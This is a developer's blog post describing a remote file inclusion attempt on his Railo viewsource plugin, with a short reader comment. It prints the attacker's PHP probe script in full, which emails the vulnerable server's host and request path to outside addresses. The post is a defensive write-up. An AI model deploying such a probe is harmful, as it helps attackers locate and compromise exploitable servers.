Hacking attempt

Today I got an error which said that "file http://www.odigoslimnisplastira.gr/giros/large/111.txt? could not be viewed". The error was coming from my viewsource plugin, which uses a url variable 'file' to determine which file to show the source for.
Off course I added a check in that file so only certain files can be viewed, but if I had not... Then Railo would have downloaded and read the file, which would have shown this on-screen:

<?php
//=================================
//
// Scan inb0x hotmail v1.0
//
// coded by _[[NetWork]]_
// não rippem fdps :]
//
//
// Elite Group Forever2008
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto = "Vulll.";
$email1 = "ckaixa.imbox@gmail.com,dkfft.lk@hotmail.com";
$headers = "From: <$email>\r\n";

if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "Opa, enviado!";
exit();
}
else{
echo "Não enviei..";
exit();
}
?>

Now, displaying this code on-screen is not a problem, but if I instead had a script that would have run the code for some obscure reason, then these "elite group" nerds would now know which file on my server allows for remote uploads and execution.

I guess I should just add the mod_httpbl Apache module from Project Honeypot. Will do so when their site is back up!

del.icio.us Digg StumbleUpon Facebook Technorati Fav reddit Google Bookmarks
| Viewed 2645 times
  1. Dorie

    #1 by Dorie - May 24, 2011 at 7:44 PM

    Wow, that’s a really cleevr way of thinking about it!
(will not be published)
Leave this field empty